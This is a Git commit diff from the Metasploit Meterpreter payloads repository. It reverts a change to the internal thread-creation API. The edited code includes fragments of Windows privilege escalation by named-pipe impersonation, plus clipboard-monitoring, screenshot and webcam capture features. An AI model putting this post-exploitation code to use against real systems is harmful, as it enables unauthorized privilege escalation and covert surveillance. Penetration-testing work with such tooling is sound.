github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-01-14 17:37:27 +01:00
Code Releases Activity

Revert "Add a fourth parameter to the thread API"

Browse Source 
This reverts commit 0afe17d160.
This commit is contained in:
Spencer McIntyre 2020-08-19 11:48:16 -04:00
parent cf4614c941
commit ee69b4f274
14 changed files with 56 additions and 44 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
c/meterpreter/source/common/common_metapi.h
View File

@ -69,7 +69,7 @@ typedef struct _ThreadApi
BOOL(*kill)(THREAD* thread);
BOOL(*run)(THREAD* thread);
BOOL(*sigterm)(THREAD* thread);
THREAD*(*create)(THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3, LPVOID param4);
THREAD*(*create)(THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3);
THREAD*(*open)();
HANDLE(*create_remote)(HANDLE hProcess, SIZE_T sStackSize, LPVOID pvStartAddress, LPVOID pvStartParam, DWORD dwCreateFlags, LPDWORD pdwThreadId);
HANDLE(*update_token)( Remote *remote, HANDLE token );

1
c/meterpreter/source/common/common_thread.h
View File

@ -25,7 +25,6 @@ struct _THREAD
LPVOID parameter1;
LPVOID parameter2;
LPVOID parameter3;
LPVOID parameter4;
};

2
c/meterpreter/source/extensions/extapi/clipboard.c
View File

@ -1230,7 +1230,7 @@ DWORD request_clipboard_monitor_start(Remote *remote, Packet *packet)
BREAK_WITH_ERROR("[EXTAPI CLIPBOARD] Unable to allocate memory for clipboard events", ERROR_NOT_ENOUGH_MEMORY);
}
pState->hThread = met_api->thread.create((THREADFUNK)clipboard_monitor_thread_func, pState, NULL, NULL, NULL);
pState->hThread = met_api->thread.create((THREADFUNK)clipboard_monitor_thread_func, pState, NULL, NULL);
if (pState->hThread == NULL)
{

68
c/meterpreter/source/extensions/priv/namedpipe.c
View File

@ -34,10 +34,9 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
HANDLE hPipe = NULL;
HANDLE hSem = NULL;
char * cpPipeName = NULL;
Remote * remote = NULL;
BYTE bMessage[128] = {0};
DWORD dwBytes = 0;
PostImpersonationCallback fPostImpersonation = NULL;
PPRIV_POST_IMPERSONATION pPostImpersonation = NULL;
do {
if (!thread) {
@ -45,11 +44,10 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
}
cpPipeName = (char *)thread->parameter1;
remote = (Remote *)thread->parameter2;
hSem = (HANDLE)thread->parameter3;
fPostImpersonation = (PostImpersonationCallback)thread->parameter4;
hSem = (HANDLE)thread->parameter2;
pPostImpersonation = (PPRIV_POST_IMPERSONATION)thread->parameter3;
if (!cpPipeName || !remote) {
if (!cpPipeName) {
BREAK_WITH_ERROR("[ELEVATE] elevate_namedpipe_thread. invalid thread arguments",
ERROR_BAD_ARGUMENTS);
}
@ -96,8 +94,8 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. ImpersonateNamedPipeClient failed");
}
if (fPostImpersonation) {
dwResult = fPostImpersonation(remote);
if (pPostImpersonation) {
dwResult = pPostImpersonation->pCallback(pPostImpersonation->pCallbackParam);
if (dwResult != ERROR_SUCCESS) {
RevertToSelf();
CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. the post impersonation callback failed");
@ -128,13 +126,14 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
*/
DWORD elevate_via_service_namedpipe(Remote * remote, Packet * packet)
{
DWORD dwResult = ERROR_SUCCESS;
char * cpServiceName = NULL;
THREAD * pThread = NULL;
HANDLE hSem = NULL;
char cServiceArgs[MAX_PATH] = {0};
char cServicePipe[MAX_PATH] = {0};
OSVERSIONINFO os = {0};
DWORD dwResult = ERROR_SUCCESS;
char * cpServiceName = NULL;
THREAD * pThread = NULL;
HANDLE hSem = NULL;
char cServiceArgs[MAX_PATH] = {0};
char cServicePipe[MAX_PATH] = {0};
OSVERSIONINFO os = {0};
PRIV_POST_IMPERSONATION PostImpersonation;
do {
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
@ -162,7 +161,10 @@ DWORD elevate_via_service_namedpipe(Remote * remote, Packet * packet)
"cmd.exe /c echo %s > %s", cpServiceName, cServicePipe);
hSem = CreateSemaphore(NULL, 0, 1, NULL);
pThread = met_api->thread.create(elevate_namedpipe_thread, &cServicePipe, remote, hSem, post_callback_use_self);
PostImpersonation.pCallback = post_callback_use_self;
PostImpersonation.pCallbackParam = remote;
pThread = met_api->thread.create(elevate_namedpipe_thread, &cServicePipe, hSem, &PostImpersonation);
if (!pThread) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_service_namedpipe. met_api->thread.create failed",
ERROR_INVALID_HANDLE);
@ -235,20 +237,21 @@ DWORD elevate_via_service_namedpipe(Remote * remote, Packet * packet)
*/
DWORD elevate_via_service_namedpipe2(Remote * remote, Packet * packet)
{
DWORD dwResult = ERROR_SUCCESS;
THREAD * pThread = NULL;
HANDLE hServiceFile = NULL;
HANDLE hSem = NULL;
LPVOID lpServiceBuffer = NULL;
char * cpServiceName = NULL;
THREAD * pthread = NULL;
char cServicePath[MAX_PATH] = {0};
char cServiceArgs[MAX_PATH] = {0};
char cServicePipe[MAX_PATH] = {0};
char cTempPath[MAX_PATH] = {0};
DWORD dwBytes = 0;
DWORD dwTotal = 0;
DWORD dwServiceLength = 0;
DWORD dwResult = ERROR_SUCCESS;
THREAD * pThread = NULL;
HANDLE hServiceFile = NULL;
HANDLE hSem = NULL;
LPVOID lpServiceBuffer = NULL;
char * cpServiceName = NULL;
THREAD * pthread = NULL;
char cServicePath[MAX_PATH] = {0};
char cServiceArgs[MAX_PATH] = {0};
char cServicePipe[MAX_PATH] = {0};
char cTempPath[MAX_PATH] = {0};
DWORD dwBytes = 0;
DWORD dwTotal = 0;
DWORD dwServiceLength = 0;
PRIV_POST_IMPERSONATION PostImpersonation;
do
{
@ -298,7 +301,10 @@ DWORD elevate_via_service_namedpipe2(Remote * remote, Packet * packet)
}
hSem = CreateSemaphore(NULL, 0, 1, NULL);
pThread = met_api->thread.create(elevate_namedpipe_thread, &cServicePipe, remote, hSem, post_callback_use_self);
PostImpersonation.pCallback = post_callback_use_self;
PostImpersonation.pCallbackParam = remote;
pThread = met_api->thread.create(elevate_namedpipe_thread, &cServicePipe, hSem, &PostImpersonation);
if (!pThread) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_service_namedpipe2. met_api->thread.create failed",
ERROR_INVALID_HANDLE);

5
c/meterpreter/source/extensions/priv/namedpipe.h
View File

@ -6,4 +6,9 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD* thread);
DWORD elevate_via_service_namedpipe(Remote* remote, Packet* packet);
DWORD elevate_via_service_namedpipe2(Remote* remote, Packet* packet);
typedef struct _PRIV_POST_IMPERSONATION {
PostImpersonationCallback pCallback;
PVOID pCallbackParam;
} PRIV_POST_IMPERSONATION, * PPRIV_POST_IMPERSONATION;
#endif

5
c/meterpreter/source/extensions/priv/namedpipe_rpcss.c
View File

@ -298,6 +298,7 @@ DWORD elevate_via_service_namedpipe_rpcss(Remote* remote, Packet* packet)
OSVERSIONINFO os = { 0 };
HANDLE hPipe = NULL;
DWORD dwPipeUid[2] = { 0, 0 };
PRIV_POST_IMPERSONATION PostImpersonation;
do {
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
@ -323,7 +324,9 @@ DWORD elevate_via_service_namedpipe_rpcss(Remote* remote, Packet* packet)
dprintf("[ELEVATE] elevate_via_service_namedpipe_rpcss. using pipename: %s", cPipeName1);
hSem = CreateSemaphore(NULL, 0, 1, NULL);
pThread = met_api->thread.create(elevate_namedpipe_thread, &cPipeName1, remote, hSem, post_callback_use_rpcss);
PostImpersonation.pCallback = post_callback_use_rpcss;
PostImpersonation.pCallbackParam = remote;
pThread = met_api->thread.create(elevate_namedpipe_thread, &cPipeName1, hSem, &PostImpersonation);
if (!pThread) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_service_namedpipe_rpcss. met_api->thread.create failed", ERROR_INVALID_HANDLE);
}

2
c/meterpreter/source/extensions/stdapi/server/ui/desktop.c
View File

@ -456,7 +456,7 @@ DWORD request_ui_desktop_screenshot(Remote * remote, Packet * request)
dprintf("[UI] desktop_screenshot. dwCurrentSessionId=%d, dwActiveSessionId=%d, cCommandLine=%s\n", dwCurrentSessionId, dwActiveSessionId, cCommandLine);
// start a thread to create a named pipe server and wait for a client to connect an send back the JPEG screenshot.
pPipeThread = met_api->thread.create(desktop_screenshot_thread, &cNamedPipe, response, NULL, NULL);
pPipeThread = met_api->thread.create(desktop_screenshot_thread, &cNamedPipe, response, NULL);
if (!pPipeThread)
{
BREAK_WITH_ERROR("[UI] desktop_screenshot. met_api->thread.create failed", ERROR_INVALID_HANDLE);

2
c/meterpreter/source/extensions/stdapi/server/webcam/webcam.cpp
View File

@ -668,7 +668,7 @@ extern "C" {
// kick off the worker thread that will do all the cam handling on one thread to avoid
// cross-threaded COM problems.
g_pWorkerThread = met_api->thread.create(webcam_control_thread, g_pThreadState, NULL, NULL, NULL);
g_pWorkerThread = met_api->thread.create(webcam_control_thread, g_pThreadState, NULL, NULL);
if (g_pWorkerThread == NULL) {
BREAK_WITH_ERROR("[WEBCAM] Failed to create thread.", ERROR_THREAD_1_INACTIVE);

2
c/meterpreter/source/metsrv/base.c
View File

@ -488,7 +488,7 @@ BOOL command_handle(Remote *remote, Packet *packet)
*commands = baseCommand;
*(commands + 1) = extensionCommand;
cpt = thread_create(command_process_thread, remote, packet, commands, NULL);
cpt = thread_create(command_process_thread, remote, packet, commands);
if (cpt)
{
dprintf("[DISPATCH] created command_process_thread 0x%08X, handle=0x%08X", cpt, cpt->handle);

2
c/meterpreter/source/metsrv/pivot_packet_dispatch.c
View File

@ -18,7 +18,7 @@ DWORD THREADCALL pivot_packet_dispatch_thread(THREAD* thread)
DWORD pivot_packet_dispatch(PivotContext* pivotCtx, LPBYTE packetBuffer, DWORD packetSize)
{
THREAD* thread = thread_create(pivot_packet_dispatch_thread, pivotCtx, packetBuffer, (LPVOID)(DWORD_PTR)packetSize, NULL);
THREAD* thread = thread_create(pivot_packet_dispatch_thread, pivotCtx, packetBuffer, (LPVOID)(DWORD_PTR)packetSize);
if (thread)
{
dprintf("[PIVOTPACKET] Dispatching packet on new thread %p", thread);

2
c/meterpreter/source/metsrv/scheduler.c
View File

@ -150,7 +150,7 @@ DWORD scheduler_insert_waitable( HANDLE waitable, LPVOID entryContext, LPVOID th
entry->pause = event_create();
entry->resume = event_create();
swt = thread_create( scheduler_waitable_thread, entry, threadContext, NULL, NULL );
swt = thread_create( scheduler_waitable_thread, entry, threadContext, NULL );
if( swt != NULL )
{
dprintf( "[SCHEDULER] created scheduler_waitable_thread 0x%08X", swt );

2
c/meterpreter/source/metsrv/server_transport_tcp.c
View File

@ -675,7 +675,7 @@ static void transport_reset_tcp(Transport* transport, BOOL shuttingDown)
// before cleaning up the socket. This is done in another thread so that functionality
// can continue.
dprintf("[TCP] It should now be safe to close the socket.");
THREAD* t = thread_create(cleanup_socket, (LPVOID)ctx->fd, NULL, NULL, NULL);
THREAD* t = thread_create(cleanup_socket, (LPVOID)ctx->fd, NULL, NULL);
thread_run(t);
}
}

3
c/meterpreter/source/metsrv/thread.c
View File

@ -204,7 +204,7 @@ static ULONG THREADCALL thread_preamble(THREAD* thread)
/*
* Create a new thread in a suspended state.
*/
THREAD* thread_create(THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3, LPVOID param4)
THREAD* thread_create(THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3)
{
THREAD* thread = NULL;
@ -231,7 +231,6 @@ THREAD* thread_create(THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID para
thread->parameter1 = param1;
thread->parameter2 = param2;
thread->parameter3 = param3;
thread->parameter4 = param4;
thread->funk = funk;
thread->handle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)thread_preamble, thread, CREATE_SUSPENDED, &thread->id);

2
c/meterpreter/source/metsrv/thread.h
View File

@ -50,7 +50,7 @@ BOOL event_poll( EVENT * event, DWORD timeout );
THREAD * thread_open( VOID );
THREAD * thread_create( THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3, LPVOID param4 );
THREAD * thread_create( THREADFUNK funk, LPVOID param1, LPVOID param2, LPVOID param3 );
void disable_thread_error_reporting(void);